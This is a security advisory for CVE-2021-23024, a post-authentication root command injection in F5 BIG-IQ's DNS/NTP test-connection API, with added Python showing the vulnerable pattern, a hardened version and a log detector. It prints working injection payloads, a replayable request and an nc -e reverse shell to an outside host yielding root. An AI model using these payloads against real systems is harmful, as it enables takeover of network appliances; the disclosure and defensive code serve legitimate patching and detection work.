1337DAY-ID-36468
Jeremy Brown
Jun 23, 2021 - 12:00 a.m.

F5 BIG-IQ VE 8.0.0-2923215 Remote Root Vulnerability

0day.today

CVSS3: 7.2 High
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK | Attack Complexity: LOW | Privileges Required: HIGH | User Interaction: NONE | Scope: UNCHANGED | Confidentiality Impact: HIGH | Integrity Impact: HIGH | Availability Impact: HIGH

CVSS2: 9.0 High
AV:N/AC:L/Au:S/C:C/I:C/A:C
Access Vector: NETWORK | Access Complexity: LOW | Authentication: SINGLE | Confidentiality Impact: COMPLETE | Integrity Impact: COMPLETE | Availability Impact: COMPLETE

EPSS: 0.015 Low (Percentile: 86.4%)

F5 BIG-IQ VE v8.0.0-2923215 Post-auth Remote Root RCE

CVE-2021-23024

=======
Details
=======

It was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection.

There are two blind command injection bugs, in the Test DNS Connection and Test NTP Connection features, both of which make a request to mgmt/shared/system/easy-setup-test-connection. The server addresses supplied in that request end up inside a shell command that runs as root (see the execution log below).

User accounts tested for calling the API:

- Admin
- User + Administrator Role

SSH is enabled by default for the root user, but the system does not intend the admin account to have shell access; its login shell is /bin/false:

admin:x:0:500:Admin User:/home/admin:/bin/false

An admin (or a user with admin-like privileges) can nonetheless elevate to root and obtain a shell via command injection in the web portal.

=====
Repro
=====

https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit

Modify the dnsServerAddresses (or ntpServerAddresses) JSON field of the request this page issues and replay it.

=======
Request
=======

PUT /mgmt/shared/system/easy-setup-test-connection HTTP/1.1
X-F5-Auth-Token: eyJraW.....
.....

{"dnsServerAddresses":["$(id>/tmp/id)"],"ntpServerAddresses":[]}

or

{"dnsServerAddresses":["8.8.8.8"],"ntpServerAddresses":["$(whoami)"]}

========
Response
========

HTTP/1.1 400 Bad Request
Server: webd
.....

{"code":400,"message":"Dns $(id>/tmp/id) is not valid\n","originalRequestBody":"{\"dnsServerAddresses\":[\"$(id>/tmp/id)\"],\"ntpServerAddresses\":[]}","referer":"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit","restOperationId":2101063,"errorStack":[],"kind":":resterrorresponse"}

and, respectively, for the NTP payload:

{"code":400,"message":"NTP $(whoami) is not valid\n","originalRequestBody":"{\"dnsServerAddresses\":[\"8.8.8.8\"],\"ntpServerAddresses\":[\"$(whoami)\"]}","referer":"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit","restOperationId":2149253,"errorStack":[],"kind":":resterrorresponse"}

=============
Execution Log
=============

DNS:

pid=7349 executed [/bin/sh -c  dig +short +time=5 +tries=1 @$(id>/tmp/id) ]
pid=7351 executed [id ]
pid=7349 executed [dig +short +time=5 +tries=1 @ ]

[root@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] config # cat /tmp/id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

NTP:

pid=1288 executed [/bin/sh -c dig +short +time=5 +tries=1 @8.8.8.8  $(whoami) ]
pid=1290 executed [whoami ]
pid=1288 executed [dig +short +time=5 +tries=1 @8.8.8.8 root ]
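The execution log above shows the root cause: the address taken from the JSON body is interpolated into a single string handed to /bin/sh -c, so the shell expands $(...) before dig ever runs, and it does so as root. The following Python model of that pattern, beside the argv-list form and an allow-list validated version, is an added example and is not code from the advisory or from F5. It uses echo in place of dig so that it runs offline with deterministic output; the function and regex names are the example's own.

```python
import ipaddress
import re
import subprocess

# dig options from the advisory's execution log; 'echo' stands in for 'dig'
# below so the example runs offline and its output is deterministic.
DIG_ARGS = ["+short", "+time=5", "+tries=1"]

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def vulnerable_test_connection(server: str) -> str:
    """The pattern seen in the execution log: the user-supplied address is
    pasted into one string that /bin/sh parses, so $(...), backticks, ';'
    and friends are evaluated by the shell before the tool runs."""
    cmd = "echo " + " ".join(DIG_ARGS) + " @" + server
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def argv_without_shell(server: str) -> str:
    """Same command as an argv list: no shell parses the value, so '$(...)'
    reaches the tool as literal bytes. Necessary but not sufficient: dig would
    still receive garbage, and a caller could still point it at arbitrary
    hosts, so validation is needed on top."""
    argv = ["echo", *DIG_ARGS, "@" + server]
    out = subprocess.run(argv, capture_output=True, text=True, check=True)
    return out.stdout.strip()


def is_valid_server(server: str) -> bool:
    """Allow-list check: an IPv4/IPv6 literal or a plain hostname, nothing else."""
    try:
        ipaddress.ip_address(server)
        return True
    except ValueError:
        return _HOSTNAME_RE.match(server) is not None


def hardened_test_connection(server: str) -> str:
    """Validate against the allow-list first, then exec without a shell."""
    if not is_valid_server(server):
        raise ValueError(f"invalid DNS/NTP server address: {server!r}")
    return argv_without_shell(server)


if __name__ == "__main__":
    payload = "$(echo injected)"  # harmless stand-in for $(id>/tmp/id) from the advisory
    print("shell=True :", vulnerable_test_connection(payload))
    print("argv list  :", argv_without_shell(payload))
    try:
        hardened_test_connection(payload)
    except ValueError as e:
        print("hardened   :", e)
    print("hardened   :", hardened_test_connection("8.8.8.8"))
```

With the shell=True form the output reads "+short +time=5 +tries=1 @injected": the substitution ran before echo (or dig) saw its arguments, which is exactly what "pid=7351 executed [id ]" followed by "dig ... @ " records in the log. The argv form passes "@$(echo injected)" through untouched, and the hardened form refuses it before any process is spawned.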

============
Exploitation
============

The netcat binary with -e support is already installed on the system, which makes a reverse shell easy for the demo.

Submitting a command such as "nc 10.0.0.100 5000 -e /bin/bash" through the same injection point connects back to our listener; on the client we drop into a root shell on the BIG-IQ server.

$ nc -l -p 5000
... connection received

python -c 'import pty; pty.spawn("/bin/bash")'

[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # pwd

/var/service/restjavad

[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # id

uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # ps
.....
32320 ?        S      0:00 su elasticsearch -s /bin/bash -c export JAVA_HOME=/usr/lib/jvm/jre-1.8.0-openjdk.x86_64;export ES_JAVA_OPTS='-Xms6000m -Xmx6000m';export ES_PATH_CONF=/var/config/rest/elasticsearch/config;exec bin/elasticsearch >/dev/null 2>&1
32335 tty1     S      0:00 python -c import pty; pty.spawn("/bin/bash")
32336 pts/0    Ss     0:00 /bin/bash
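The process log format the advisory quotes (pid=N executed [cmd]) is also a usable detection source: a dig launched through /bin/sh -c with command substitution or other shell metacharacters in its arguments, or a netcat started with -e, has no legitimate reason to appear on a BIG-IQ. The detector below is an added example, not part of the advisory or of any F5 tooling. The log lines it runs over are constructed to mirror the execution log above plus the nc -e command from this section, and the rule names and regexes are the example's own.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in the advisory's "pid=N executed [cmd]" format:
# the DNS and NTP injections from the execution log, a benign test
# connection, a backtick variant, and the nc -e reverse shell.
SAMPLE_LOG = """\
pid=7349 executed [/bin/sh -c  dig +short +time=5 +tries=1 @$(id>/tmp/id) ]
pid=7351 executed [id ]
pid=7349 executed [dig +short +time=5 +tries=1 @ ]
pid=1288 executed [/bin/sh -c dig +short +time=5 +tries=1 @8.8.8.8  $(whoami) ]
pid=1290 executed [whoami ]
pid=1288 executed [dig +short +time=5 +tries=1 @8.8.8.8 root ]
pid=2001 executed [/bin/sh -c dig +short +time=5 +tries=1 @8.8.8.8 ]
pid=2002 executed [nc 10.0.0.100 5000 -e /bin/bash ]
pid=2003 executed [/bin/sh -c dig +short +time=5 +tries=1 @`id` ]
"""

LINE_RE = re.compile(r"^pid=(\d+) executed \[(.*?)\s*\]$")
# Shell constructs that have no business inside a DNS/NTP server address.
METACHAR_RE = re.compile(r"\$\(|`|\$\{|[;&|<>]")
SUBSTITUTION_RE = re.compile(r"\$\([^)]*\)|`[^`]*`")
# netcat with the -e option (a program to exec after connecting).
NC_EXEC_RE = re.compile(r"^(?:/usr/bin/)?(?:nc|ncat|netcat)\s.*\s-e\s")


@dataclass
class Finding:
    pid: int
    rule: str
    command: str
    detail: str


def parse_line(line: str):
    """Return (pid, command) for a log line, or None if the format does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return int(m.group(1)), m.group(2)


def extract_substitutions(command: str):
    """The $(...) and `...` fragments smuggled into a command string."""
    return SUBSTITUTION_RE.findall(command)


def analyze(log_text: str):
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        pid, command = parsed
        # Rule 1: dig launched via 'sh -c' with shell metacharacters in the
        # argument string. In the advisory this is restjavad running as root.
        if command.startswith("/bin/sh -c") and " dig " in command and METACHAR_RE.search(command):
            subs = extract_substitutions(command)
            detail = ", ".join(subs) if subs else "shell metacharacter in dig argument"
            findings.append(Finding(pid, "sh-c-dig-metachar", command, detail))
        # Rule 2: netcat asked to exec a program, the reverse-shell vector used above.
        elif NC_EXEC_RE.search(command):
            exec_target = command.split("-e", 1)[1].strip()
            findings.append(Finding(pid, "netcat-exec", command, exec_target))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"pid={f.pid} rule={f.rule} detail={f.detail!r}")
```

Rule 1 deliberately keys on the parent "sh -c dig" line rather than on the child ("id", "whoami"), because the child is an ordinary binary that can appear in benign contexts; the parent line is where the injected fragment is still visible, and the pid ties the two together. The benign line for pid 2001 is not flagged.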

===
Fix
===

https://support.f5.com/csp/article/K06024431
